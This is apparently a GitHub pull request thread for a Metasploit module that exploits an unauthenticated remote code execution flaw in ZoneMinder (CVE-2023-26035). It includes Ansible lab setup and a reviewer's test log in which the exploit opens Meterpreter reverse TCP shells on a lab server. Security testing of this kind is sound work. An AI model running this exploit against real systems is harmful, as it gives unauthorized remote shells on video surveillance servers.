Zoneminder snapshot

[whotwagner]

This PR adds an exploit module for an unauthenticated remote code execution vulnerability in Zoneminder(CVE-2023-26035).

Verification

List the steps needed to make sure this thing works

• Start msfconsole
• use exploit/unix/webapp/zoneminder_snapshots
• ...
• Verify the thing does what it should
• Verify the thing does not do what it should not
• Document the thing and how it works (Example)

It is possible to install zoneminder using a 3rd-party debian repository: https://zoneminder.readthedocs.io/en/stable/installationguide/debian.html#easy-way-debian-11-bullseye
The repository also allows to install old versions of zoneminder in Debian Bullseye: apt install zoneminder=1.36.31-bullseye1

[bwatters-r7]

I have tried about 6 different ways to install this product. If you use an older version of Ubuntu, as the instructions suggest, it fails because apt no longer sees the right repositories, If you use a more updated version of Linux, MySQL configuration chokes.
If I use the Docker container, I get an empty Apache page on HTTPS, and nothing on HTTP. I tried to replicate on Debian as well and I don't remember why it failed.
If you have more definitive guidance, please list it. I'm going to pull my name off this for a while to look at other PRs because I must be missing something, here.

[whotwagner]

I have tried about 6 different ways to install this product. If you use an older version of Ubuntu, as the instructions suggest, it fails because apt no longer sees the right repositories, If you use a more updated version of Linux, MySQL configuration chokes. If I use the Docker container, I get an empty Apache page on HTTPS, and nothing on HTTP. I tried to replicate on Debian as well and I don't remember why it failed. If you have more definitive guidance, please list it. I'm going to pull my name off this for a while to look at other PRs because I must be missing something, here.

I installed everything with ansible on the following debian-image: https://cloud.debian.org/images/cloud/bullseye/20210814-734/ (i used the qcow2-image). the ansible-requirements are:

roles:
  - src: https://github.com/ait-cs-IaaS/atb-ansible-zoneminder.git
    version: v1.2
    name: zoneminder
  - src: https://github.com/ait-cs-IaaS/atb-ansible-debiansnapshot.git
    version: v1.2
    name: debiansnapshot
  - src: https://github.com/ait-cs-IaaS/ansible-mariadb.git
    version: v1.0.0
    name: mariadb
  - src: https://github.com/ait-cs-IaaS/ansible-apache2.git
    version: v1.3
    name: apache2

I used the following ansible-playbook:

- name: Install old Debian-Archive-Repo Host
  hosts: all
  remote_user: debian
  become: true
  vars:
    debsnap_timestamp: 20210815T082041Z
    debsnap_debrelease: bullseye
  roles:
    - role: debiansnapshot

- name: Install Videoserver Host
  hosts: all
  remote_user: debian
  become: true
  tasks:
    - name: Install Videoserver Packages
      ansible.builtin.apt:
          pkg:
            - vim
            - curl
            - netcat-traditional
          update_cache: yes

  roles:
          - role: mariadb
          - role: apache2
            vars:
              apache2_modules:
                - name: "headers"
                - name: "rewrite"
                - name: "expires"
                - name: "cgi"
              apache2_vhosts:
                - name: default
                  http: true
                  vhost_template: "redir.j2"
          - role: zoneminder
            vars:
              zoneminder_debrelease: bullseye

I also used a redirect for the apache role under templates/redir.j2:

<VirtualHost *:80>
	ServerName {{ item.name }}
{% if item.aliases is defined %}
	ServerAlias {{ item.aliases|join(' ') }}
{% endif %}
	DocumentRoot {{ apache2_vhost_dir }}/{{ item.name }}
        RedirectMatch ^/$ /zm/
	ErrorLog {{ apache2_vhost_dir }}/{{ item.name }}/log/error.log
	CustomLog {{ apache2_vhost_dir }}/{{ item.name }}/log/access.log combined

	<Directory "{{ apache2_vhost_dir }}/{{ item.name }}">
		Options FollowSymLinks MultiViews
		AllowOverride All
		Require all granted
	</Directory>
</VirtualHost>

If this doesn't help I can also share a fully provisioned qcow2 image with you.

[jheysel-r7]

I have tried about 6 different ways to install this product. If you use an older version of Ubuntu, as the instructions suggest, it fails because apt no longer sees the right repositories, If you use a more updated version of Linux, MySQL configuration chokes. If I use the Docker container, I get an empty Apache page on HTTPS, and nothing on HTTP. I tried to replicate on Debian as well and I don't remember why it failed. If you have more definitive guidance, please list it. I'm going to pull my name off this for a while to look at other PRs because I must be missing something, here.

I installed everything with ansible on the following debian-image: https://cloud.debian.org/images/cloud/bullseye/20210814-734/ (i used the qcow2-image). the ansible-requirements are:

roles:
  - src: https://github.com/ait-cs-IaaS/atb-ansible-zoneminder.git
    version: v1.2
    name: zoneminder
  - src: https://github.com/ait-cs-IaaS/atb-ansible-debiansnapshot.git
    version: v1.2
    name: debiansnapshot
  - src: https://github.com/ait-cs-IaaS/ansible-mariadb.git
    version: v1.0.0
    name: mariadb
  - src: https://github.com/ait-cs-IaaS/ansible-apache2.git
    version: v1.3
    name: apache2

I used the following ansible-playbook:

- name: Install old Debian-Archive-Repo Host
  hosts: all
  remote_user: debian
  become: true
  vars:
    debsnap_timestamp: 20210815T082041Z
    debsnap_debrelease: bullseye
  roles:
    - role: debiansnapshot

- name: Install Videoserver Host
  hosts: all
  remote_user: debian
  become: true
  tasks:
    - name: Install Videoserver Packages
      ansible.builtin.apt:
          pkg:
            - vim
            - curl
            - netcat-traditional
          update_cache: yes

  roles:
          - role: mariadb
          - role: apache2
            vars:
              apache2_modules:
                - name: "headers"
                - name: "rewrite"
                - name: "expires"
                - name: "cgi"
              apache2_vhosts:
                - name: default
                  http: true
                  vhost_template: "redir.j2"
          - role: zoneminder
            vars:
              zoneminder_debrelease: bullseye

I also used a redirect for the apache role under templates/redir.j2:

<VirtualHost *:80>
	ServerName {{ item.name }}
{% if item.aliases is defined %}
	ServerAlias {{ item.aliases|join(' ') }}
{% endif %}
	DocumentRoot {{ apache2_vhost_dir }}/{{ item.name }}
        RedirectMatch ^/$ /zm/
	ErrorLog {{ apache2_vhost_dir }}/{{ item.name }}/log/error.log
	CustomLog {{ apache2_vhost_dir }}/{{ item.name }}/log/access.log combined

	<Directory "{{ apache2_vhost_dir }}/{{ item.name }}">
		Options FollowSymLinks MultiViews
		AllowOverride All
		Require all granted
	</Directory>
</VirtualHost>

If this doesn't help I can also share a fully provisioned qcow2 image with you.

Hey @whotwagner, if you could email a copy of the fully provisioned qcow2 image to [email protected], that would be super useful! Thanks in advance.

[jheysel-r7]

Thanks for the great module @whotwagner, also for emailing the target image over to us, that was a big help.

I've just made a couple suggestions with regards to rescuing connection errors but other than that the module looks good. Testing was as expected for both targets:

nix Command:

ENCTYPE: eTYPE-AES256-CTS-HMAC-SHA1-96 (18)

msf6 exploit(unix/webapp/zoneminder_snapshots) > set rhosts 192.168.65.2
rhosts => 192.168.65.2
msf6 exploit(unix/webapp/zoneminder_snapshots) > set lhost 192.168.65.1
lhost => 192.168.65.1
msf6 exploit(unix/webapp/zoneminder_snapshots) > run

[*] Started reverse TCP handler on 192.168.65.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Elapsed time: 19.59511300001759 seconds.
[+] The target is vulnerable.
[*] Fetching CSRF Token
[+] Got Token: key:2027e86be06af584f16f789d714528235a3643af,1699561583
[*] Executing nix Command for cmd/linux/http/x64/meterpreter/reverse_tcp
[*] Sending payload
[*] Sending stage (3045380 bytes) to 192.168.65.2
[*] Meterpreter session 1 opened (192.168.65.1:4444 -> 192.168.65.2:36000) at 2023-11-09 15:26:25 -0500
[+] Payload sent

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : atb-videoserver-image-2023-10-22t08-35-06z.novalocal
OS           : Debian 11.0 (Linux 5.10.0-8-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > bg

Linux (Dropper):

msf6 exploit(unix/webapp/zoneminder_snapshots) > set target 1
target => 1
msf6 exploit(unix/webapp/zoneminder_snapshots) > run

[*] Started reverse TCP handler on 192.168.65.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Elapsed time: 13.220129999972414 seconds.
[+] The target is vulnerable.
[*] Fetching CSRF Token
[+] Got Token: key:997a66a9dd7d6203744b0f3454f2b5b543787698,1699561825
[*] Executing Linux (Dropper) for linux/x64/meterpreter/reverse_tcp
[*] Sending payload
[*] Sending stage (3045380 bytes) to 192.168.65.2
[*] Meterpreter session 2 opened (192.168.65.1:4444 -> 192.168.65.2:36002) at 2023-11-09 15:30:26 -0500
[+] Payload sent
[*] Command Stager progress - 100.00% done (823/823 bytes)

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : atb-videoserver-image-2023-10-22t08-35-06z.novalocal
OS           : Debian 11.0 (Linux 5.10.0-8-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > back

I'll land this once the docs file is updated with the ansible yaml files 👍

[jheysel-r7]

Release Notes

This PR adds an exploit module for an unauthenticated remote code execution vulnerability in the video surveillance software Zoneminder (CVE-2023-26035).